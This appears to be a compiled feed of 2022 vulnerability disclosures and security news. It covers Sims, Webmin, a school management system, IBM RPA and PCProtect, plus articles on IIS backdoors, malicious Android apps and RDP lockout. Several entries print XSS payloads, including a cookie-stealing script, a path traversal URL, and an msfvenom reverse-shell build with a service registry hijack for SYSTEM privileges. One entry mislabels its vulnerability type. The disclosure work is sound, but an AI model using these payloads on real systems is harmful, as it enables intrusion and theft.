Sims v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /addNotifyServlet. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the notifyInfo parameter.

****\[Suggested description\]****

This open source system is a student information management system. There was an insecurity vulnerability in the announcement. Attackers can use this vulnerability to implement cross-site scripting attacks on website visitors, such as "cookie theft" and "browser escape".  
POST: http://localhost:8081/sims/addNotifyServlet

**\[Vulnerability Type\]**

Relative Path Traversal

****\[Vendor of Product\]****

https://github.com/rawchen/sims

****\[Affected Product Code Base\]****

1.0

****\[Affected Component\]****

Sims 1.0

OS: Windows/Linux/macOS

Browser: Chrome、Firefox、Safari

****\[Attack vector\]****

    POST /sims/addNotifyServlet HTTP/1.1
    Host: localhost:8081
    Content-Length: 61
    Cache-Control: max-age=0
    sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost:8081
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost:8081/sims/notifyServlet
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=77DABFA8A6AB24922A384BFF7C7B9517
    Connection: close
     
    notifyInfo=%3Cscript%3Ealert%28%22123456%22%29%3C%2Fscript%3E
    

****\[Attack Type\]****

Remote

****\[Impact Code execution\]****

False

****\[Proof of concept\]****

Step1: Select "Announcement List" under the "System Management" tab, fill in the constructed payload into the input box, and publish it.

Step2: When accessing the bulletin, the vulnerability is triggered

**\[Reference(s)\]**

http://cwe.mitre.org/data/definitions/79.html

CVE-2022-34550: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') · Issue #8 · rawchen/sims

Sims v1.0 was discovered to allow path traversal when downloading attachments.

****\[Suggested description\]****

Relative Path Traversal exists in sims. The front end of this open source system is an online examination system. This open source system is a student information management system. An insecurity vulnerability exists when downloading attachments. Attackers can exploit this vulnerability to obtain sensitive server information, such as "/etc/passwd", "backup files", etc.  
GET: http://localhost:8081/sims/downloadServlet

****\[Vulnerability Type\]****

Relative Path Traversal

****\[Vendor of Product\]****

https://github.com/rawchen/sims

****\[Affected Product Code Base\]****

1.0

****\[Affected Component\]****

Sims 1.0

OS: Windows/Linux/macOS

Browser: Chrome、Firefox、Safari

****\[Attack vector\]****

    http://localhost:8081/sims/downloadServlet?filename=../index.jsp
    

**\[Attack Type\]**

Remote

****\[Impact Code execution\]****

False

****\[Proof of concept\]****

Step1: Under the "System Management" tab, select "File Release", select any file, and click the "Start Upload" button.

Step2: The upload is successful, and under the "System Management" tab, select "File List" and click the "Download" button to obtain the download interface.

Step3: Refactor the download interface parameters to implement directory spanning and arbitrary file download.

**\[Reference(s)\]**

http://cwe.mitre.org/data/definitions/23.html

CVE-2022-34551: Relative Path Traversal · Issue #7 · rawchen/sims

The Microsoft 365 Defender Research Team has warned that attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers.
The post IIS extensions are on the rise as backdoors to servers appeared first on Malwarebytes Labs.

The Microsoft 365 Defender Research Team has warned that attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers.

IIS extensions are able to stay hidden in target environments and as such provide a long-term persistence mechanism for attackers.

**IIS**

IIS is webserver software created by Microsoft that runs on Windows systems. Most commonly, organizations use IIS to host ASP.NET web applications and static websites. It can also be used as an FTP server, host WCF services, and be extended to host web applications built on other platforms such as PHP.

Exchange Server 2016 and Exchange Server 2019 automatically configure multiple Internet Information Services (IIS) virtual directories during the server installation. As a result, administrators are not always aware of the origin of some directories and their functionality.

**IIS modules**

The IIS 7 and above web server feature set is componentized into more than thirty independent modules. A module is either a Win32 DLL (native module) or a .NET 2.0 type contained within an assembly (managed module). Similar to a set of building blocks, modules are added to the server in order to provide the desired functionality for applications.

Malicious IIS modules are near perfect backdoors. Once installed, they will respond to specifically crafted HTTP requests sent by the operator instructing the server to collect emails, add further malicious access, or use the compromised servers for clandestine purposes. These requests will seem normal to the unsuspicious eye.

**IIS backdoors**

IIS backdoors are harder to detect since they mostly reside in the same directories as legitimate modules, and they follow the same code structure as clean modules. The actual backdoor code is hard to detect as such and that also makes it hard to determine the origin.

**ProxyLogon and ProxyShell**

Some of the methods used to drop malicious IIS extensions are known as ProxyLogon and ProxyShell. ProxyLogon consists of four vulnerabilities which can be combined to form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, the attackers deploy web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.

The ProxyShell exploit is very similar to ProxyLogon and was discovered more recently. ProxyShell is a different attack chain designed to exploit three separate vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207.

**Malicious behavior**

On its blog, the Microsoft Team describes a custom IIS backdoor called FinanceSvcModel.dll which has a built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration. What’s interesting in this example is how the threat actor forced the system to use the WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user’s plaintext password in memory. This allowed the threat actor to steal the actual passwords and not just the hashes.

Credential stealing can be a goal by itself. But stolen credentials also allow the attackers to remain persistent in the environment, even if the primary backdoor is detected. Credential stealing modules monitor for specific requests to determine a sign-in activity and dump the provided credentials in a file the threat actor can retrieve later.

Given the rising energy prizes and the falling, yet still profitable, cryptocurrency exchange rates, we wouldn’t be surprised to find servers abused for cryptomining. A few years ago we saw threat actors leveraging an IIS 6.0 vulnerability to take over Windows servers and install a malware strain that mined the Electroneum cryptocurrency.

**Mitigation, detection, and remediation**

There are several thing you can do to minimize the risk and consequences of a malicious IIS extension:

*   Keep your server software up to date to minimize the risk of infection.
*   Use security software that also covers your servers.
*   Regularly check loaded IIS modules on exposed IIS servers (notably Exchange servers), leveraging existing tools from the IIS servers suite.
*   Deploy a backup strategy that creates regular backups that are easy to deploy when needed.
*   Review permission and access policies, combined with credential hygiene.
*   Prioritize alerts that show patterns of server compromise. It can help to catch attacks in the exploratory phase, the period in which attackers spend time exploring the environment after gaining initial access.

Stay safe, everyone!

IIS extensions are on the rise as backdoors to servers

As many as 30 malicious Android apps with cumulative downloads of nearly 10 million have been found on the Google Play Store distributing adware.
"All of them were built into various programs, including image-editing software, virtual keyboards, system tools and utilities, calling apps, wallpaper collection apps, and others," Dr.Web said in a Tuesday write-up.
While masquerading as innocuous

As many as 30 malicious Android apps with cumulative downloads of nearly 10 million have been found on the Google Play Store distributing adware.

"All of them were built into various programs, including image-editing software, virtual keyboards, system tools and utilities, calling apps, wallpaper collection apps, and others," Dr.Web said in a Tuesday write-up.

While masquerading as innocuous apps, their primary goal is to request permissions to show windows over other apps and run in the background in order to serve intrusive ads.

To make it difficult for the victims to detect and uninstall the apps, the adware trojans hide their icons from the list of installed apps in the home screen or replace the icons with others that are likely to be less noticed (e.g., SIM Toolkit).

Some of these apps also offer the advertised features, as observed in the case of two apps: "Water Reminder- Tracker & Reminder" and "Yoga- For Beginner to Advanced." However, they also covertly load various websites in WebView, and simulate user actions to click on banners and ads.

Also uncovered are another set of apps distributing the Joker malware in the form of launcher, camera, and emoji stickers apps that, when installed, subscribe users to paid mobile services without their knowledge and consent.

The third category of rogue apps relates to those that pose as image editing software but, in reality, are designed to break into Facebook accounts.

"Upon launching, they asked potential victims to log in to their accounts and then loaded a genuine Facebook authorization page," Dr.Web researchers said. "Next, they hijacked the authentication data and sent it to malicious actors."

*   Photo Editor: Beauty Filter (gb.artfilter.tenvarnist)
*   Photo Editor: Retouch & Cutout (de.nineergysh.quickarttwo)
*   Photo Editor: Art Filters (gb.painnt.moonlightingnine)
*   Photo Editor - Design Maker (gb.twentynine.redaktoridea)
*   Photo Editor & Background Eraser (de.photoground.twentysixshot)
*   Photo & Exif Editor (de.xnano.photoexifeditornine)
*   Photo Editor - Filters Effects (de.hitopgop.sixtyeightgx)
*   Photo Filters & Effects (de.sixtyonecollice.cameraroll)
*   Photo Editor : Blur Image (de.instgang.fiftyggfife)
*   Photo Editor : Cut, Paste (de.fiftyninecamera.rollredactor)
*   Emoji Keyboard: Stickers & GIF (gb.crazykey.sevenboard)
*   Neon Theme Keyboard (com.neonthemekeyboard.app)
*   Neon Theme - Android Keyboard (com.androidneonkeyboard.app)
*   Cashe Cleaner (com.cachecleanereasytool.app)
*   Fancy Charging (com.fancyanimatedbattery.app)
*   FastCleaner: Cashe Cleaner (com.fastcleanercashecleaner.app)
*   Call Skins - Caller Themes (com.rockskinthemes.app)
*   Funny Caller (com.funnycallercustomtheme.app)
*   CallMe Phone Themes (com.callercallwallpaper.app)
*   InCall: Contact Background (com.mycallcustomcallscrean.app)
*   MyCall - Call Personalization (com.mycallcallpersonalization.app)
*   Caller Theme (com.caller.theme.slow)
*   Caller Theme (com.callertheme.firstref)
*   Funny Wallpapers - Live Screen (com.funnywallpapaerslive.app)
*   4K Wallpapers Auto Changer (de.andromo.ssfiftylivesixcc)
*   NewScrean: 4D Wallpapers (com.newscrean4dwallpapers.app)
*   Stock Wallpapers & Backgrounds (de.stockeighty.onewallpapers)
*   Notes - reminders and lists (com.notesreminderslists.app)

Last but not least, also spotted on the app storefront was a rogue communications app known as "Chat Online," which tricks users into providing their mobile phone numbers under the pretext of signing up for online dating services.

In a different version of the same malware, a seemingly real conversation is initiated, only for the app to prompt users to pay for premium access to continue the chat, incurring fraudulent charges.

Although these apps have been purged, it's no surprise that mobile malware has been proven to be resilient, what with the criminal actors constantly finding new ways to bypass protections put in place by Google.

Users are recommended to exercise caution when it comes to downloading apps, Google Play or otherwise, and refrain from granting extensive permissions to apps. Turning on Google Play Protect and scrutinizing app reviews and ratings are other ways to secure devices from malware.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

These 28+ Android Apps with 10 Million Downloads from the Play Store Contain Malware

A DLL hijacking vulnerability in the MA Smart Installer for Windows prior to 5.7.7, which allows local users to execute arbitrary code and obtain higher privileges via careful placement of a malicious DLL into the folder from where the Smart installer is being executed.

CVE-2022-2313

The Read Mail module in Webmin 1.995 and Usermin through 1.850 allows XSS via a crafted HTML e-mail message.

**Security Alerts**

This page lists security problems found in Webmin and Usermin, versions affected and recommended solutions.

Found a new security bug? Report it at security@webmin.com.

**Webmin 1.995 and below - XSS vulnerability in the HTTP Tunnel module**  

If a less-privileged Webmin user is given permission to edit the configuration of the HTTP Tunnel module, he could use this to introduce a vulnerability that captures cookies belonging to other Webmin users that use the module. Thanks to BLACK MENACE and PYBRO for reporting this issue.

**Webmin 1.995 and Usermin 1.850 and below - XSS vulnerabiliy in the Read Mail module**  

An HTML email crafted by an attacker could capture browser cookies when opened. Thanks to ly1g3 for reporting this bug.

**Webmin 1.991 and below - privilege escalation exploit (CVE-2022-30708)**  

Less privileged Webmin users (excluding those created by Virtualmin and Cloudmin) can modify arbitrary files with root privileges, and so run commands as root. All systems with additional untrusted Webmin users should upgrade immediately. Thanks to esp0xdeadbeef and V1s3r1on for finding and reporting this issue!

**Webmin 1.984 and below - File Manager privilege exploit (CVE-2022-0824 and CVE-2022-0829)**  

Less privileged Webmin users who do not have any File Manager module restrictions configured can access files with root privileges, if using the default Authentic theme. All systems with additional untrusted Webmin users should upgrade immediately. Note that Virtualmin systems are not effected by this bug, due to the way domain owner Webmin users are configured. Thanks to Faisal Fs (faisalfs10x) from NetbyteSEC for finding and reporting this issue!

**Virtualmin Procmail wrapper version 1.0 - Privilege escalation exploit.**  

Version 1.0 of the procmail-wrapper package installed with Virtualmin has a vulnerability that can be used by anyone with SSH access to gain root privileges. To prevent this, all Virtualmin users should upgrade to version 1.1 or later immediately.

**Webmin 1.973 and below - XSS vulnerabilities if Webmin is installed using the setup.pl script (CVE-2021-31760, CVE-2021-31761 and CVE-2021-31762)**  

If Webmin is installed using the non-recommended setup.pl script, checking for unknown referers is not enabled by default. This opens the system up to XSS and CSRF attacks using malicious links.  
Fortunately the standard RPM, Deb, TAR and Solaris packages do not use this script and so are not vulnerable. If you did install using the setup.pl script, the vulnerability can be fixed by adding the line referers\_none=1 to /etc/webmin/config . Thanks to Meshal ( Mesh3l\_911 ) @Mesh3l\_911 and Mohammed ( Z0ldyck ) @electronicbots for finding and reporting this issue!

**Webmin 1.941 and below - XSS vulnerability in the Command Shell module (CVE-2020-8820 and CVE-2020-8821)**  

A user with privileges to create custom commands could exploit other users via unescaped HTML. Thanks to Mauro Cáseres for reporting this and the following issue.

**Webmin 1.941 and below - XSS vulnerability in the Read Mail module (CVE-2020-12670)**  

Saving a malicious HTML attachment could trigger and XSS vulnerability.

**Webmin 1.882 to 1.921 - Remote Command Execution (CVE-2019-15231)**  

Webmin releases between these versions contain a vulernability that allows remote command execution! Version 1.890 is vulnerable in a default install and should be upgraded immediately - other versions are only vulnerable if changing of expired passwords is enabled, which is not the case by default.  
Either way, upgrading to version 1.930 is strongly recommended. Alternately, if running versions 1.900 to 1.920, edit /etc/webmin/miniserv.conf, remove the passwd\_mode= line, then run /etc/webmin/restart.  
For more details, see our What Happened page.

**Webmin 1.900 - Remote Command Execution (Metasploit)**  

This is NOT a workable exploit as it requires that the attacker already know the root password. Hence there is no fix for it in Webmin.

**Malicious HTTP headers in downloaded URLs**  
Affects Webmin versions up to 1.860, if the Upload and Download or File Manager module is used to fetch an untrusted URL.

If a Webmin user downloads a file from a malicious URL, HTTP headers returned can be used exploit an XSS vulnerability. Thanks to independent security researcher, John Page aka hyp3rlinx, who reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

**Authentic theme configuration page vulnerability**  
Affects Webmin versions up to 1.800, but is only an issue if your system has un-trusted users with Webmin access and is using the new Authentic theme.

A non-root Webmin user could use the theme configuration page to execute commands as root.

**Authentic theme remote access vulnerability**  
Affects Webmin versions up to 1.800, but only if the Authentic theme is enabled globally.  

An attacker could execute commands remotely as root, as long as there was no firewall blocking access to Webmin's port 10000.

**XSS (cross-site scripting) vulnerability in xmlrpc.cgi**  
Affects Webmin versions up to 1.750.  

A malicious website could create links or Javascript referencing the xmlrpc.cgi script, triggered when a user logged into Webmin visits the attacking site. Thanks to Peter Allor from IBM for finding and reporting this issue (CVE-2015-1990).

**Read Mail module vulerable to malicious links**  
Affects Webmin versions up to 1.720.  

If un-trusted users have both SSH access and the ability to use Webmin's Read Mail module (as is the case for Virtualmin domain owners), a malicious link could be created to allow reading any file on the system - even those owned by root. Thanks to Patrick William from RACK911 labs for finding this bug.

**Shellshock vulnerability**  
Affects Webmin versions up to 1.700.  

If your bash shell is vulnerable to shellshock, it can be exploited by attackers who have a Webmin login to run arbitrary commands as root. Updating to version 1.710 (or updating bash) will fix this issue.

**Yet another XSS (cross-site scripting) security hole**  
Affects Webmin versions up to 1.590.  

A malicious website could create links or Javascript referencing the File Manager module that allowed execution of arbitrary commands via Webmin when the website is viewed by the victim. See CERT vulnerability note VU#788478 for more details. Thanks to Jared Allar from the American Information Security Group for reporting this problem.

**Referer checks don't include port**  
Affects Webmin versions up to 1.590.  

If an attacker has control over http://example.com/ , he could create a page with malicious Javascript that could take over a Webmin session at https://example.com:10000/ when http://example.com/ is viewed by the victim. Thanks to Marcin Teodorczyk for finding this issue.

**Another XSS (cross-site scripting) security hole**  
Affects Webmin versions up to 1.540.  

This vulnerability can be triggered if an attacker changes his Unix username via a tool like chfn, and a page listing usernames is then viewed by the root user in Webmin. Thanks to Javier Bassi for reporting this bug.

**Unsafe file writes in Virtualmin**  
Affects Virtualmin versions before 3.70.  

This bug allows a virtual server owner to read or write to arbitrary files on the system by creating malicious symbolic links and then having Virtualmin perform operations on those links. Upgrading to version 3.70 is strongly recommended if your system has un-trusted domain owners.

**XSS (cross-site scripting) security hole**  
Affects Webmin versions up to 1.390, and Usermin up to 1.320.  

This attack could open users who visit un-trusted websites while having Webmin open in the same browser up to having their session cookie captured, which could then allow an attacker to login to Webmin without a password. The quick fix is to go to the **Webmin Configuration** module, click on the **Trusted Referers** icon, set **Referrer checking enabled?** to **Yes**, and un-check the box **Trust links from unknown referrers**. Webmin 1.400 and Usermin 1.330 will make these settings the defaults.

**Windows-only command execution bug**  
Affects Webmin on Windows only, versions before 1.380.  

Any user logged into Webmin can execute any command using special URL parameters. This could be used by less-privileged Webmin users to raise their level of access.  
Thanks for Keigo Yamazaki of Little eArth Corporation for finding this bug.

**pam\_login.cgi XSS bug**  
Affects Webmin versions below 1.347, and Usermin versions below 1.277, on any operating system.  

A malicious link to Webmin's pam\_login.cgi script can be used to execute Javascript within the Webmin server context, and perhaps steal session cookies.

**chooser.cgi XSS bug**  
Affects Webmin versions below 1.330, and Usermin versions below 1.260, on any operating system.  

When using Webmin or Usermin to browse files on a system that were created by an attacker, a specially crafted filename could be used to inject arbitrary Javascript into the browser.

**Remote source code access and XSS bug**  
Affects Webmin versions below 1.296, and Usermin versions below 1.226, on any operating system.  

An attacker can view the source code of Webmin CGI and Perl programs using a specially crafted URL. Because the source code for Webmin is freely available, this issue should only be of concern to sites that have custom modules for which they want the source to remain hidden.  
The XSS bug makes use of a similar technique to craft a URL that can allow arbitrary Javascript to be executed in the user's browser if a malicious link is clicked on.  
Thanks for Keigo Yamazaki of Little eArth Corporation for finding this bug.

**Artbitrary remote file access**  
Affects Webmin versions below 1.290, and Usermin versions below 1.220, on any operating system.  

An attacker without a login to Webmin can read the contents of any file on the server using a specially crafted URL. All users should upgrade to version 1.290 as soon as possible, or setup IP access control in Webmin.  
Thanks to Kenny Chen for bringing this to my attention.

**Windows artbitrary file access**  
Affects Webmin versions below 1.280, when running on a Windows server.  

If running Webmin on Windows, an attacker can remotely view the contents of any file on your system using a specially crafted URL. This does not affect other operating systems, but if you use Webmin on Windows you should upgrade to version 1.280 or later.  
Thanks to Keigo Yamazaki of Little eArth Corporation for discovering this bug.

**Perl syslog input attack**  
Affects Webmin versions below 1.250 and Usermin versions below 1.180, with syslog logging enabled.  

When logging of failing login attempts via syslog is enabled, an attacker can crash and possibly take over the Webmin webserver, due to un-checked input being passed to Perl's syslog function. Upgrading to the latest release of Webmin is recommended.  
Thanks to Jack at Dyad Security for reporting this problem to me.

**'Full PAM conversations' mode remote attack**  
Affects Webmin versions between 1.200 and 1.220 and Usermin version between 1.130 and 1.150, when the option **Support full PAM conversations?** is enabled on the **Authentication** page.  

When this option is enabled in Webmin or Usermin, an attacker can gain remote access to Webmin without needing to supply a valid login or password. Fortunately this option is not enabled by default and is rarely used unless you have a PAM setup that requires more than just a username and password, but upgrading is advised anyway.  
Thanks to Keigo Yamazaki of Little eArth Corporation and JPCERT/CC for discovering and notifying me of this bug.

**Brute force password guessing attack**  
Affects Webmin versions below 1.175 and Usermin version below 1.104  

All versions of Webmin below 1.175 do not have password timeouts turned on by default, so an attacker can try every possible password for the root or admin user until he finds the correct one. The solution is to enable password timeouts, so that repeated attempts to login as the same user will become progressively slower. This can be done by following these steps :

*   Go to the **Webmin Configuration** module.
*   Click on the **Authentication** icon.
*   Select the **Enable password timeouts** button.
*   Click the **Save** button at the bottom of the page.

This problem is also present in Usermin, and can be prevented by following the same steps in the **Usermin Configuration** module.

**Usermin cross-site scripting vulnerability**  
Affects Usermin versions below 1.080  

When viewing HTML email, several potentially dangerous types of URLs can be passed through. This can be used to perform malicious actions like executing commands as the logged-in Usermin user. Can only be resolved by upgrading to Webmin 1.150 or Usermin 1.080.

**Module configurations are visible**  
Affects Webmin versions below 1.150  

Even if a Webmin user does not have access to a module, he can still view it's Module Config page by entering a URL that calls config.cgi with the module name as a parameter. This can only be resolved by upgrading to version 1.150 or later.

**Account lockout attack**  
Affects Webmin versions below 1.150 and Usermin versions below 1.080  

By sending a specially constructed password, an attacker can lock out other users if password timeouts are enabled. This can only be resolved by upgrading to Webmin 1.150 or Usermin 1.080.

CVE-2022-36880: Webmin

Advanced School Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component ip/school/moudel/update_subject.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Edit Subject text field.

**Advanced School Management System v1.0 by itsourcecode.com has Cross-site Scripting (XSS)**

**Vul\_Author: Liyuan Ji**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendor: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability url: ip/school/view/subject.php

Vulnerability location: ip/school/moudel/update\_subject.php

\[+\] Payload: <script>alert(document.cookie)</script>

Tested on Windows 10, phpStudy

There is an exemple with alert:

    GET /school/model/update_subject.php?id=15&nama=%3Cscript%3Ealert(documant.cookie)%3C/script%3E$do=update_subject HTTP/1.1
    Host: 192.168.1.19
    User-Agent: Mozilla/5.0(X11;Linux x86_64; rw:91.0) Gecko/20100101Firefox/91.0
    Accept: */*
    Accept-Language: en-Us,en;q-0.5
    Accept-Encoding: gzip,deflate
    Connection: close
    Referer: http://192.168.1.19/school/view/subject.php
    Cookie: PHPSESSID=5nicpveormjn86h3bf398fsem3
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    

We click the subject interface and edit it.

XSS script that writes the burst cookie.

After we update, click subject again.

We have obtained the cookie.

It can be seen from the source code that it is an XSS attack using SQL injection vulnerability.

CVE-2022-34594: bug_report/XSS-1.md at master · gitgeniuss/bug_report

Microsoft is taking RDP attacks to task in Windows 11, with default lockdowns for too many incorrect passwords entered.
The post Microsoft clamps down on RDP brute-force attacks in Windows 11 appeared first on Malwarebytes Labs.

It wasn’t so long ago that we were wondering what improvements Windows 11 would make in the security stakes. Well, we haven’t had to wait too long to find out.

Windows 11 build 22528.1000 and up will tackle one of the more common entry points for network intruders. Namely, trying to prevent the brute forcing of Remote Desktop Protocol (RDP) by adding a default RDP lockout policy:

> @windowsinsider Win11 builds now have a DEFAULT account lockout policy to mitigate RDP and other brute force password vectors. This technique is very commonly used in Human Operated Ransomware and other attacks – this control will make brute forcing much harder which is awesome! pic.twitter.com/ZluT1cQQh0
> 
> — David Weston (DWIZZZLE) (@dwizzzleMSFT) July 20, 2022

Being able to access a computer remotely is a proverbial killer app for business. Unfortunately, this comes with several dangers if not configured correctly. Microsoft’s latest changes are designed to address these threats head on.

**RDP: a hot target for network intrusion**

RDP attacks are a prime tool for ransomware operators. Brute forcing a way into vulnerable machines is often the first step to total network compromise and data exfiltration. Microsoft’s own research in this realm is particularly illuminating with regard to giving a flavour of scale:

> _We analyzed several months’ worth of data to mine insights into the types of RDP brute force attacks occurring across Microsoft Defender ATP customers. Out of about 45,000 machines that had both RDP public IP connections and at least 1 network failed sign-in, we discovered that, on average, several hundred machines per day had high probability of undergoing one or more RDP brute force attack attempts. Of the subpopulation of machines with detected brute force attacks, the attacks lasted 2-3 days on average, with about 90% of cases lasting for 1 week or less, and less than 5% lasting for 2 weeks or more._

The research goes on to say:

> _Out of the hundreds of machines with RDP brute force attacks detected in our analysis, we found that about .08% were compromised. Furthermore, across all enterprises analyzed over several months, on average about 1 machine was detected with high probability of being compromised resulting from an RDP brute force attack every 3-4 days._

To summarise: RDP attacks are not uncommon, and it’s important to be able to tell the difference between genuine failed sign-ins and actual brute forcing. In situations where brute forcing is taking place with few to zero security precautions for an organisation’s RDP setup, this can be fatal in giving attackers one foot in the door.

**Microsoft battens down the hatches**

Our own research shows how rate limiting the number of password attempts can hinder attackers enough that they leave empty-handed:

> _In our test, attackers were shut out for five minutes if they entered five incorrect passwords within the space of five minutes. Our attackers were persistent over several days and received, on average, about 150 bans per day._
> 
> _To trigger 150 bans per day, our attackers must have made 750 incorrect guesses and incurred 750 minutes of bans, leaving them 690 minutes of the day in which to guess passwords. 750 guesses in 690 minutes gives us a guessing rate of about one password every 55 seconds, or about 1,500 guesses per day._
> 
> _At that guessing rate, rate limiting reduced the number of daily password attempts from 1500 to 750, halving the effectiveness of the attack and doubling the time a security team would have to react._

What Microsoft is doing is setting the lockout to 10 failed attempts in 10 minutes. Some consideration has been given to the fact that not everyone is going to be running Windows 11, and older versions exist that could do with some lockout love. Ask and you shall receive, because these changes are also being applied to older versions of Windows:

> Yes it’s being backported
> 
> — David Weston (DWIZZZLE) (@dwizzzleMSFT) July 21, 2022

Microsoft recently reversed a decision to undo the blocking of VBA Macros after uproar among Office users. Hopefully the people making security decisions will continue to clamp down on potential weak spots and easy routes to success for network intruders and malware authors. RDP is the opening salvo of choice for many intrusion attempts, and making these lockouts the default can only be a good thing.

Microsoft clamps down on RDP brute-force attacks in Windows 11

IBM Robotic Process Automation 21.0.0, 21.0.1, and 21.0.2 could allow a user with access to the local host (client machine) to obtain a login access token. IBM X-Force ID: 223019.

  

**Summary**

Security Bulletin: IBM Robotic Process Automation is vulnerable to insufficiently protected access tokens (CVE-2022-22412)

**Vulnerability Details**

**CVEID:**   CVE-2022-22412  
**DESCRIPTION:**   IBM Robotic Process Automation could allow a user with access to the local host (client machine) to obtain a login access token.  
CVSS Base score: 4.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/223019 for the current score.  
CVSS Vector: (CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)  
**

IBM Robotic Process Automation

 < 21.0.3

  

**Remediation/Fixes**

**IBM strongly recommends addressing the vulnerability now.**

**Product(s)**

**Version(s) number and/or range** 

**Remediation/Fix/Instructions**

IBM Robotic Process Automation

< 21.0.3

Update to 21.0.3 or higher

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

22 Jun 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSC50T","label":"IBM Robotic Process Automation"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"}\],"Version":"21.0.0, 21.0.1, 21.0.2","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-22412: IBM Robotic Process Automation is vulnerable to insufficiently protected access tokens (CVE-2022-22412)

PCProtect Endpoint version 5.17.470 fails to provide sufficient anti-tampering protection that can be leveraged to achieve SYSTEM privileges.

[+] Credits: Yehia Elghaly (aka Mrvar0x)      
[+] Website: https://mrvar0x.com/  
[+] Source:  https://mrvar0x.com/2022/07/21/pcprotect-endpoint-tampering-exploit/

Vendor:  
=============  
www.pcprotect.com

Product:  
===========  
PCProtect Endpoint Protection v5.17.470

PCProtect is a malware detection and antivirus scanner. It uses advanced heuristics and a massive, continuously updated database to detect malware files on Windows, macOS, and Android devices. It also has an iOS app.  
PCProtect also includes additional features, including:  
Web shield - Virtual private network (VPN) - Data breach monitor - Identity theft protection - System optimizer- Password manager- And much more…

Vulnerability Type:  
===================  
Missing Tamper Protection  
Incorrect Authorization

CVE Reference:  
==============  
N/A

Security Issue:  
================  
PCProtect Antivirus prior to version 5.17.470 installed on Microsoft Windows does not provide sufficient anti-tampering protection of services by users with Administrator privileges. This could result in a user disabling PCProtect Antivirus and the protection offered by it. Also It lead to Raised privilege to SYSTEM.

That can occurred by modifying a specific registry key.  
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityService  
Change ImagePath path to a malicious executable.

Exploit/POC:  
=============  
Create malicious executable through msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o meta.exe

Modify (ImagePath) with the path of the malicious executable - Restart

Network Access:  
===============  
Local

Severity:  
=========  
High

[+] Disclaimer  
The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).

Mrvar0x

Tag

#windows